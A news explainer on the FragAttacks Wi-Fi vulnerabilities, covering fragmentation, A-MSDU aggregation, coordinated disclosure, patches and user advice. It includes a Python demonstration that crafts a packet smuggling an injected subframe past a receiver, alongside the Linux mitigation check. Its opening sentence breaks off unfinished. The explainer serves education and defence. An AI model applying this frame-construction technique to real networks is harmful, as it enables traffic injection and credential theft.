Mathy Vanhoef, a security researcher known for finding holes in Wi-Fi security, has found a new way to attack Wi-Fi devices, which he calls FragAttacks (fragmentation and aggregation attacks). The method works on any Wi-Fi device back to 1
FragAttacks is a collection of vulnerabilities. Three of them are design flaws in the 802.11 standard itself, and those date back to the original 1997 version of the standard; the rest are implementation bugs in individual products. The design flaws affect every Wi-Fi security protocol, from WPA3 all the way back to WEP.
Vanhoef's demonstration video shows how worrying the consequences can be. In it he switches an insecure IoT smart plug on and off, steals a username and password, and takes over a Windows 7 machine on a network that is otherwise "secure". Stealing credentials and taking over computers is a serious concern, to say the least.
To understand the vulnerabilities, it helps to know two things a Wi-Fi link does with data. Fragmentation splits a large frame into several smaller fragments that are sent separately and reassembled by the receiver; on a noisy link a lost fragment costs only a small retransmission instead of the whole frame. Aggregation does the opposite: it bundles several small packets into one larger frame (an A-MSDU), so less airtime goes to per-frame overhead and throughput improves.
A frame is the unit of data on a Wi-Fi link, comparable to a packet at the network layer. It carries a header, which includes flags saying whether the frame is a fragment or an aggregated frame, followed by the payload. The vulnerabilities abuse those flags and the reassembly process to inject frames into an otherwise protected network. In particular, FragAttacks can trick a device into accepting a frame it should have rejected, for example one that merely looks like a handshake message.
Once the device has accepted the frame as a handshake message, another part of its code treats the same frame as an aggregated frame and processes a second subframe, and that subframe carries the real malicious data. As Vanhoef put it, "In a way, some of the code will think that the frame is a handshake message and will accept it, even if it is not encrypted. Another part of the code instead sees it as an aggregated frame and processes the packet that the opponent wants to inject."
The attack works against any Wi-Fi device and network, even those that do not support fragmentation or aggregation, because many such devices still process individual fragments or subframes as if they were complete frames and therefore accept the injected data. Several shortcomings, in the standard and in the implementations, together make all of this possible.
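The aggregation half of this mechanism can be seen in a few lines of Python. This is an added illustration, not code from Vanhoef's paper or from his test tool. It builds an ordinary IPv4/UDP packet that an attacker-controlled server sends to the victim, then parses the same decrypted frame body once as a normal frame and once as an aggregated (A-MSDU) frame, which is what happens when the "A-MSDU present" bit in the QoS Control field is flipped (that bit is masked out of the authenticated data, so flipping it does not break the integrity check). Because the A-MSDU subframe header (destination, source, length) overlaps the LLC/SNAP and IP headers byte for byte, bytes 12-13 of the body, which are the IPv4 identification field, become the length of the first subframe, so a sender that chooses the identification field also chooses where the second subframe starts. All MAC and IP addresses, ports and the injected payload are constructed for the example. The receiver-side `deliver` function also shows the mitigation the Linux A-MSDU parser adopted: an aggregated frame whose first destination address equals the RFC 1042 LLC/SNAP bytes is dropped.

```python
import struct

# LLC/SNAP (RFC 1042) header that opens every normal, non-aggregated IPv4 frame body.
RFC1042_IPV4 = bytes.fromhex("aaaa030000000800")
# Bit 7 of the QoS Control field: "A-MSDU present". It is masked out of the
# CCMP/GCMP additional authenticated data, so an attacker can flip it unnoticed.
AMSDU_PRESENT = 0x0080

# Constructed addresses for the example (not real devices).
VICTIM_MAC = bytes.fromhex("001122334455")
GATEWAY_MAC = bytes.fromhex("66778899aabb")


def ipv4_header(src, dst, ident, payload_len, proto=17):
    """Minimal IPv4 header; checksum left zero, it plays no role in the parse."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                       0, 64, proto, 0, src, dst)


def parse_amsdu(payload):
    """Split an A-MSDU body into (dst, src, body) subframes.

    Each subframe is a 14-byte Ethernet-style header (dst, src, length) followed
    by `length` bytes of body; all but the last are padded to a 4-byte boundary.
    """
    subframes, off = [], 0
    while off + 14 <= len(payload):
        dst, src = payload[off:off + 6], payload[off + 6:off + 12]
        length = struct.unpack("!H", payload[off + 12:off + 14])[0]
        body = payload[off + 14:off + 14 + length]
        if len(body) < length:
            break  # truncated subframe: stop, deliver nothing further
        subframes.append((dst, src, body))
        off = (off + 14 + length + 3) & ~3
    return subframes


def first_subframe_is_llc_snap(payload):
    """Receiver mitigation (the check Linux added to its A-MSDU parser): a genuine
    A-MSDU starts with a destination MAC, whereas a normal frame whose flag was
    flipped starts with the LLC/SNAP bytes AA AA 03 00 00 00 instead."""
    return payload[:6] == RFC1042_IPV4[:6]


def deliver(payload, qos_ctrl, hardened=False):
    """What the receiver hands up the stack for one decrypted frame body."""
    if not qos_ctrl & AMSDU_PRESENT:
        return [payload]                       # one ordinary packet
    if hardened and first_subframe_is_llc_snap(payload):
        return []                              # dropped as suspicious
    return [body for _, _, body in parse_amsdu(payload)]


def build_attacker_packet():
    """Ordinary IPv4/UDP packet the attacker's server sends to the victim.

    Frame body layout: LLC/SNAP (8) + IPv4 (20) + UDP (8) + UDP data.
    Read as an A-MSDU, bytes 12-13 (the IPv4 identification field) become the
    length of the first subframe. Identification 22 makes that subframe end at
    offset 36, exactly where the UDP data, and hence the second subframe, begins.
    """
    injected = (RFC1042_IPV4
                + ipv4_header(b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02", 1, 4)
                + b"evil")                     # the packet the attacker wants delivered
    second_subframe = (VICTIM_MAC + GATEWAY_MAC
                       + struct.pack("!H", len(injected)) + injected)
    udp = struct.pack("!HHHH", 53, 40000, 8 + len(second_subframe), 0) + second_subframe
    ip = ipv4_header(b"\xc0\xa8\x01\x63", b"\xc0\xa8\x01\x0a", 22, len(udp))
    return RFC1042_IPV4 + ip + udp


def build_legit_amsdu():
    """A genuine single-subframe A-MSDU, for comparison with the check above."""
    inner = RFC1042_IPV4 + ipv4_header(b"\xc0\xa8\x01\x01", b"\xc0\xa8\x01\x0a", 7, 2) + b"hi"
    return VICTIM_MAC + GATEWAY_MAC + struct.pack("!H", len(inner)) + inner


if __name__ == "__main__":
    body = build_attacker_packet()
    print("as normal frame   :", len(deliver(body, 0)), "packet")
    for pkt in deliver(body, AMSDU_PRESENT):
        print("as A-MSDU subframe:", pkt.hex())
    print("hardened receiver :", deliver(body, AMSDU_PRESENT, hardened=True))
    print("legit A-MSDU kept :", len(deliver(build_legit_amsdu(), AMSDU_PRESENT, hardened=True)))
```

Run stand-alone, the script shows the same 82 bytes delivered as one ordinary UDP packet when the flag is clear and as two subframes when it is set, the second of which is the attacker's complete inner packet. The hardened receiver drops the flipped frame but still accepts the genuine A-MSDU, which is why the LLC/SNAP check is a reasonable interim defence; the full fix is to authenticate the flag, which the standard only does when both sides negotiate it.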
The good news is that Vanhoef disclosed the vulnerabilities in a coordinated fashion, with a nine-month embargo so that vendors could prepare fixes. Microsoft has already released patches for Windows 10 that should mitigate the problem, and a fix for Linux is coming. That still leaves many IoT devices, routers and macOS vulnerable. Vanhoef even managed to trick a macOS device into switching to a malicious DNS server, which redirects unsuspecting users to attacker-controlled sites, and with control of DNS an attacker can harvest private data such as usernames, passwords and possibly more.
The better news is that most of the vulnerabilities are hard to exploit in the wild, at least at the moment. Vanhoef does say, however, that the programming errors in individual products, as opposed to the design flaws, are trivial to exploit. You can limit the exfiltration risk by sticking to HTTPS sites: with a properly configured TLS connection, an attacker who injects or redirects traffic still cannot read or modify your data in transit. Note that a spoofed DNS answer can still send you to the wrong server, so a browser that enforces HSTS and refuses to proceed on certificate errors is part of the defence.
For now, update your devices as soon as possible, especially Windows 10 devices, since Microsoft has already released patches, and stick with HTTPS whenever possible, whether you're up to date or not. The recently opened FragAttacks site describing the vulnerabilities also suggests, where patches are not yet available, to "disable fragmentation, disable pairwise rekeys, and disable dynamic fragmentation in Wi-Fi 6 (802.11ax) devices." And an open source test tool on GitHub can help check whether your routers and client devices are still vulnerable.